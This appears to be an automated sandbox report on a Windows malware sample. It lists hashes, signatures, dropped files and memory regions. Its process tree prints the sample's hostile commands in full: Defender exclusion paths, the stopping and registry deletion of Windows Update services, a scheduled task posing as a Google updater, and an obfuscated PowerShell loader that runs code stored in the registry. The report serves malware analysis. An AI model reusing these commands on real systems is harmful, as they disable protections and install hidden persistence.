Analysis
-
max time kernel
15s -
max time network
78s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
-
submitted
29-06-2023 20:49
General
-
Target
dmi1dfg7n.exe
-
Size
2.8MB
-
MD5
9253ed091d81e076a3037e12af3dc871
-
SHA1
ec02829a25b3bf57ad061bbe54180d0c99c76981
-
SHA256
78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
-
SHA512
29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
SSDEEP
49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Stops running service(s) 3 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 41 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4bf3f5d4-ba60-4752-9949-15da2c231f91}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD54d18fda07828f7a3b9fcc050b57da033
SHA18c749afeeae3d7caf2040242b97c38aa0028a9f7
SHA25642432f132bf802c095a86b40b6e75de8f3799b908bf5a066859dc29b15a9d882
SHA5120eae93a0f118e1713cb0807628dd12ef3503cf3b89ce9784c7c4ca716aecd8df37b0c8cdd2d1fc8a1958e63a328630223c4179e87c59b9c3e187f70ee9217f6f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dxwoyms2.x5j.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/396-256-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/396-254-0x0000027D85CD0000-0x0000027D85CFA000-memory.dmpFilesize
168KB
-
memory/396-261-0x0000027D85CD0000-0x0000027D85CFA000-memory.dmpFilesize
168KB
-
memory/416-249-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/416-246-0x0000017044670000-0x000001704469A000-memory.dmpFilesize
168KB
-
memory/416-260-0x0000017044670000-0x000001704469A000-memory.dmpFilesize
168KB
-
memory/624-235-0x00000222F7630000-0x00000222F7653000-memory.dmpFilesize
140KB
-
memory/624-240-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/624-255-0x00000222F7660000-0x00000222F768A000-memory.dmpFilesize
168KB
-
memory/624-238-0x00000222F7660000-0x00000222F768A000-memory.dmpFilesize
168KB
-
memory/652-135-0x000001BB79800000-0x000001BB79810000-memory.dmpFilesize
64KB
-
memory/652-141-0x000001BB79840000-0x000001BB79862000-memory.dmpFilesize
136KB
-
memory/652-150-0x000001BB79800000-0x000001BB79810000-memory.dmpFilesize
64KB
-
memory/652-134-0x000001BB79800000-0x000001BB79810000-memory.dmpFilesize
64KB
-
memory/652-149-0x000001BB79870000-0x000001BB79A8C000-memory.dmpFilesize
2.1MB
-
memory/652-148-0x000001BB79800000-0x000001BB79810000-memory.dmpFilesize
64KB
-
memory/688-237-0x000001EF5C320000-0x000001EF5C34A000-memory.dmpFilesize
168KB
-
memory/688-241-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/688-257-0x000001EF5C320000-0x000001EF5C34A000-memory.dmpFilesize
168KB
-
memory/728-264-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/728-263-0x000001FE86260000-0x000001FE8628A000-memory.dmpFilesize
168KB
-
memory/728-286-0x000001FE86260000-0x000001FE8628A000-memory.dmpFilesize
168KB
-
memory/972-248-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/972-259-0x00000207980D0000-0x00000207980FA000-memory.dmpFilesize
168KB
-
memory/972-245-0x00000207980D0000-0x00000207980FA000-memory.dmpFilesize
168KB
-
memory/1040-290-0x000002F19A890000-0x000002F19A8BA000-memory.dmpFilesize
168KB
-
memory/1040-271-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/1040-269-0x000002F19A890000-0x000002F19A8BA000-memory.dmpFilesize
168KB
-
memory/1056-272-0x0000029395360000-0x000002939538A000-memory.dmpFilesize
168KB
-
memory/1056-274-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/1056-295-0x0000029395360000-0x000002939538A000-memory.dmpFilesize
168KB
-
memory/1108-275-0x000001F023360000-0x000001F02338A000-memory.dmpFilesize
168KB
-
memory/1108-277-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/1108-299-0x000001F023360000-0x000001F02338A000-memory.dmpFilesize
168KB
-
memory/1188-280-0x00000210FBD90000-0x00000210FBDBA000-memory.dmpFilesize
168KB
-
memory/1188-281-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/1188-304-0x00000210FBD90000-0x00000210FBDBA000-memory.dmpFilesize
168KB
-
memory/1268-285-0x0000023DAE2E0000-0x0000023DAE30A000-memory.dmpFilesize
168KB
-
memory/1268-288-0x00007FFBC9D50000-0x00007FFBC9D60000-memory.dmpFilesize
64KB
-
memory/1268-310-0x0000023DAE2E0000-0x0000023DAE30A000-memory.dmpFilesize
168KB
-
memory/1280-289-0x0000024A19A30000-0x0000024A19A5A000-memory.dmpFilesize
168KB
-
memory/1280-313-0x0000024A19A30000-0x0000024A19A5A000-memory.dmpFilesize
168KB
-
memory/1324-162-0x0000015655E90000-0x0000015655EA0000-memory.dmpFilesize
64KB
-
memory/1324-163-0x0000015655E90000-0x0000015655EA0000-memory.dmpFilesize
64KB
-
memory/1324-164-0x0000015655E90000-0x0000015655EA0000-memory.dmpFilesize
64KB
-
memory/1404-316-0x000002A4EE130000-0x000002A4EE15A000-memory.dmpFilesize
168KB
-
memory/1448-320-0x0000029E95D40000-0x0000029E95D6A000-memory.dmpFilesize
168KB
-
memory/2112-190-0x000001BD90670000-0x000001BD90680000-memory.dmpFilesize
64KB
-
memory/2112-191-0x000001BD90670000-0x000001BD90680000-memory.dmpFilesize
64KB
-
memory/3400-209-0x00007FFC09BD0000-0x00007FFC09C8E000-memory.dmpFilesize
760KB
-
memory/3400-208-0x00007FFC09CD0000-0x00007FFC09EC5000-memory.dmpFilesize
2.0MB
-
memory/3400-203-0x00000262B3610000-0x00000262B3620000-memory.dmpFilesize
64KB
-
memory/3400-206-0x00000262B3610000-0x00000262B3620000-memory.dmpFilesize
64KB
-
memory/3400-205-0x00000262B3610000-0x00000262B3620000-memory.dmpFilesize
64KB
-
memory/3836-189-0x00007FF7BCAC0000-0x00007FF7BCB16000-memory.dmpFilesize
344KB
-
memory/4344-168-0x00007FF6AFCC0000-0x00007FF6AFF88000-memory.dmpFilesize
2.8MB
-
memory/4344-133-0x00007FF6AFCC0000-0x00007FF6AFF88000-memory.dmpFilesize
2.8MB
-
memory/4388-250-0x00007FF786940000-0x00007FF786C08000-memory.dmpFilesize
2.8MB
-
memory/4600-220-0x0000000000E80000-0x0000000000E90000-memory.dmpFilesize
64KB
-
memory/4600-266-0x0000000004760000-0x000000000477E000-memory.dmpFilesize
120KB
-
memory/4600-217-0x0000000003780000-0x00000000037A2000-memory.dmpFilesize
136KB
-
memory/4600-207-0x0000000003920000-0x0000000003F48000-memory.dmpFilesize
6.2MB
-
memory/4600-226-0x00000000040E0000-0x0000000004146000-memory.dmpFilesize
408KB
-
memory/4600-204-0x0000000000E40000-0x0000000000E76000-memory.dmpFilesize
216KB
-
memory/4600-218-0x0000000003820000-0x0000000003886000-memory.dmpFilesize
408KB
-
memory/4600-219-0x0000000000E80000-0x0000000000E90000-memory.dmpFilesize
64KB
-
memory/4692-227-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4692-215-0x00007FFC09CD0000-0x00007FFC09EC5000-memory.dmpFilesize
2.0MB
-
memory/4692-216-0x00007FFC09BD0000-0x00007FFC09C8E000-memory.dmpFilesize
760KB
-
memory/4692-212-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4692-210-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4692-211-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB